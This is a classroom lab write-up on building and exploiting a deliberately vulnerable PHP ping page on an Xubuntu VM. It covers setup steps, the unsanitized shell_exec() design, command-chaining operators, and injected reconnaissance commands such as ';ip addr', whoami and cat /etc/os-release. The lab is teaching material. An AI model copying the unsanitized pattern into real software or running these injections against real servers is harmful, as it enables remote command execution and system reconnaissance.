Vulnerability Research and Target Setup
Self-Developed Command Injection Vulnerability
Summary
For this project we will design and deploy a self-developed web application containing an intentional command injection vulnerability. This will simulate the common security flaw of unsafely passing user-input directly into a system command.
The vulnerable application will consist of a simple web page that allows a user to "ping" an IP address. The server-side PHP code will take the input from the URL parameter and execute it using the shell_exec() function without performing any input validation, sanitization, or escaping. Because of this, an attacker can append additional shell commands and achieve remote command execution (RCE) on the server.
We will host this application on an Ubuntu-based virtual machine derived from the cyber.local base images. After configuring Apache and PHP, we will create a vulnerable ping.php file. From an attacker machine, we will demonstrate exploitation by injecting system commands via the web interface, confirming that the server executes arbitrary OS commands under the context of the web server user.
Source:
Video Walkthrough
Setting Up Your VM
For this lab I will be using an xUbuntu VM within the VirtualBox Hypervisor. This lab can easily be done with any Linux environment as long as it supports:
Apache (or Nginx)
PHP
A simple web directory (like
/var/www/html)Basic Bash utilities
Most, if not all Linux distros support these functions. We are using Xubuntu as a target machine, as it's lightweight, making it great for using in a classroom environment. Since Xubuntu is part of the Ubuntu family, it supports Apache, PHP, and all required system tools without any special configurations, ensuring that the vulnerability can be reproduced by instructors and classmates on any Ubuntu-based system.
Import Your VM
Within VirtualBox do the following to import your VM:
Press Import
Find the OVA File you downloaded
Keep the default settings
Press Finish
You should see your VM in the left side panel
Take a Snapshot!
It's best practice to take a snapshot of your VM before making changes, especially when performing actions that may be malicious or have the potential to corrupt your system.
Click on the VM
In the right pane you should see a Snapshots section
Right-click in that section and choose Take
Name your snapshot and give it a description that will be helpful for you to remember.
Install Apache and PHP
Once you power on your VM, go to the terminal and run the following commands:
If you get errors when trying to install Apache and PHP, that means that your Ubuntu version is probably End of Life and Canonical no longer supports updates for that version. To check if your version is EOL check out the official website here --> https://documentation.ubuntu.com/project/release-team/list-of-releases/
Fix Ubuntu EOL Issue
Here is what I did to fix my EOL VM issue:
Checked my Ubuntu version with
cat /etc/os-releaseto find what version I was running
Check to see if the version was EOL on the canonical website (it was).
The repositories for older releases that are not supported get moved to an archive server. To continue using an outdated release, edit /etc/apt/sources.list and change archive.ubuntu.com and security.ubuntu.com to old-releases.ubuntu.com. This can also be done using the sed command:
Then upgrade with the following:
Once you have done this step, go back and run the two commands to install PHP and Apache from the step before.
Create a Vulnerable App
Delete default index.html and make your own
To personalize our site we can delete the default Apache index.html with the command sudo rm index.html
We can then make our own website! I chose to make mine sparkle-themed, but you can do a basic HTML site, and this will still work.
Here is my decked-out sparkle website! (Generated with Claude.ai)
Once a user submits an IP address by pressing the Ping It button, they are taken to another web page that shows the status of the ping:
To get the lab working, here are the barebones you would need for those two files to work together without all of the formatting -->
Index.html
Ping.php
Exploit Vulnerable Web app
Notice the URL when you send a request for a ping to a specific IP address. We can do something called "chaining commands" at the end of our URL to inject commands.
Chaining Commands
;(Semicolon): Allows you to execute multiple commands sequentially.&&(AND): Execute the second command only if the first command succeeds (returns a zero exit status).||(OR): Execute the second command only if the first command fails (returns a non-zero exit status).&(Background): Execute the command in the background, allowing the user to continue using the shell.|(Pipe): Takes the output of the first command and uses it as the input for the second command.
Source: https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Command%20Injection/README.md
IP addr in the text box
Try pinging your IP address again but this time adding ;ip addr to the end.
You should be able to see the IP address of the system that you are pinging!
In this case I am pinging the host system, but in an attack, you would be on a separate machine as an attacker, pinging another device to try and get their information.
IP addr in the URL
Instead of putting the command in the text box, we can also append the command to the end of the URL with the semicolon, like below:
This will give us the same output as putting it in the text box.
Additional Commands to Try
Here are some additional commands to try for your exploit:
hostname--> get the hostname of the systemwhoami--> print the current userecho "text"--> echo something back to youid--> shows current useruname -a--> system infouname -r--> kernel infocat /etc/os-release--> distro infowho--> active logged-in userspwd--> check current directorytouch /tmp/file.txt--> put a file in the system in thetmpdirectory
Last updated